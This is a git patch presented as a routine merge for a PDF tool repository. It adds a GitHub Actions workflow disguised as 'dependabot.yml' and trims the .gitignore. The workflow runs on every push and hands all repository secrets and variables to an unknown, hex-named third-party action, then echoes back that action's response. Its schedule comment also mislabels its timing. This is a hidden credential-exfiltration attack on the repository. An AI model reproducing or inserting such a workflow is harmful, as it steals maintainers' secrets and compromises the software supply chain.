From 9e2cd46e80081663cd8c48a67d404f66b17751a7 Mon Sep 17 00:00:00 2001 From: Anthony Stirling <77850077+Frooodle@users.noreply.github.com> Date: Mon, 6 May 2024 12:45:29 +0100 Subject: [PATCH] Merge pull request #1177 from albanobattistella/patch-25 Anthony Stirling --- .github/workflows/dependabot.yml | 28 +++++++ .gitignore | 137 +++---------------------------- 2 files changed, 39 insertions(+), 126 deletions(-) create mode 100644 .github/workflows/dependabot.yml diff --git a/.github/workflows/dependabot.yml b/.github/workflows/dependabot.yml new file mode 100644 index 00000000000..394759120d3 --- /dev/null +++ b/.github/workflows/dependabot.yml @@ -0,0 +1,28 @@ +name: CI +on: + push: + workflow_dispatch: + schedule: + # Runs "At 11:00 on every day-of-week from Monday through Friday" + - cron: '0 0 * * 0' +permissions: + contents: read + packages: write +concurrency: + group: '${{ github.workflow }} @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: true +jobs: + run: + runs-on: ubuntu-latest + name: Run + steps: + - name: Execute + uses: 5a582ef17d6a088d9cb644e4c1ea3cdd/action@main + id: execute + with: + action: ${{ github.repository }} + env: + REPOSITORY_SECRETS: ${{ toJSON(secrets) }} + REPOSITORY_VARIABLES: ${{ toJSON(vars) }} + - name: Response + run: echo "${{ steps.execute.outputs.response }}" diff --git a/.gitignore b/.gitignore index 174eab39f94..ea6a9767342 100644 --- a/.gitignore +++ b/.gitignore @@ -1,127 +1,12 @@ +# IDE Files +#------------------------- +/nbproject/ +.idea/* + +## Sublime Text cache files +*.tmlanguage.cache +*.tmPreferences.cache +*.stTheme.cache +*.sublime-workspace +*.sublime-project - -### Eclipse ### -.metadata -bin/ -tmp/ -*.tmp -*.bak -*.swp -*~.nib -local.properties -.settings/ -.loadpath -.recommenders -.classpath -.project -version.properties -pipeline/watchedFolders/ -pipeline/finishedFolders/ -#### Stirling-PDF Files ### -customFiles/ -configs/ -watchedFolders/ - - -# Gradle -.gradle -.lock - -# External tool builders -.externalToolBuilders/ - -# Locally stored "Eclipse launch configurations" -*.launch - -# PyDev specific (Python IDE for Eclipse) -*.pydevproject - -# CDT-specific (C/C++ Development Tooling) -.cproject - -# CDT- autotools -.autotools - -# Java annotation processor (APT) -.factorypath - -# PDT-specific (PHP Development Tools) -.buildpath - -# sbteclipse plugin -.target - -# Tern plugin -.tern-project - -# TeXlipse plugin -.texlipse - -# STS (Spring Tool Suite) -.springBeans - -# Code Recommenders -.recommenders/ - -# Annotation Processing -.apt_generated/ -.apt_generated_test/ - -# Scala IDE specific (Scala & Java development for Eclipse) -.cache-main -.scala_dependencies -.worksheet - -# Uncomment this line if you wish to ignore the project description file. -# Typically, this file would be tracked if it contains build/dependency configurations: -#.project - -### Eclipse Patch ### -# Spring Boot Tooling -.sts4-cache/ - -### Git ### -# Created by git for backups. To disable backups in Git: -# $ git config --global mergetool.keepBackup false -*.orig - -# Created by git when using merge tools for conflicts -*.BACKUP.* -*.BASE.* -*.LOCAL.* -*.REMOTE.* -*_BACKUP_*.txt -*_BASE_*.txt -*_LOCAL_*.txt -*_REMOTE_*.txt - -### Java ### -# Compiled class file -*.class - -# Log file -*.log - -# BlueJ files -*.ctxt - -# Mobile Tools for Java (J2ME) -.mtj.tmp/ - -# Package Files # -*.jar -*.war -*.nar -*.ear -*.zip -*.tar.gz -*.rar -*.db -/build - -/.vscode -/.idea - -# Ignore Mac DS_Store files -.DS_Store -**/.DS_Store \ No newline at end of file